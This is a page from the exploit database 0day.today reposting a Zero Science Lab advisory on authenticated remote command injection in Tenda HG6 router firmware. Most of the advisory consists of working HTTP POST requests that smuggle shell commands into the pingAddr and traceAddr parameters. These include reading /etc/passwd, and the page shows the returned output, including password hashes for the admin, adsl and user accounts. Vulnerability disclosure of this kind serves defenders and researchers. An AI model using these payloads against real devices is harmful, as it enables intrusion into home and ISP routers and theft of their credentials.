0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Tenda HG6 3.3.0 Remote Command Injection Vulnerability
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version: TD_HG6_XPON_TDE_ISP Summary: HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces. Tested on: Boa/0.93.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5706 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php 22.04.2022 -- ping.asp: --------- POST /boaform/formPing HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564 --- TZ app.gwdt bftpd.conf buildtime check_version.txt config config.csv config_default.xml config_default_hs.xml dhclient-script dnsmasq.conf ethertypes factory_default.xml ftpdpassword group hardversion inetd.conf init.d inittab innversion insdrv.sh irf mdev.conf omci_custom_opt.conf omci_ignore_mib_tbl.conf omci_ignore_mib_tbl_10g.conf omci_mib.cfg orf passwd ppp profile protocols radvd.conf ramfs.img rc_boot_dsp rc_voip release_date resolv.conf rtk_tr142.sh run_customized_sdk.sh runoam.sh runomci.sh runsdk.sh samba scripts services setprmt_reject shells simplecfgservice.xml smb.conf softversion solar.conf solar.conf.in ssl_cert.pem ssl_key.pem version wscd.conf ping6.asp: ---------- POST /boaform/formPing6 HTTP/1.1 Host: 192.168.1.1 pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp --- boa.conf web tracert.asp: ------------ POST /boaform/formTracert HTTP/1.1 Host: 192.168.1.1 traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp --- /home/httpd tracert6.asp: ------------- POST /boaform/formTracert6 HTTP/1.1 Host: 192.168.1.1 traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp --- admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh nobody:x:0:0::/tmp:/dev/null user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh # 0day.today [2024-09-29] #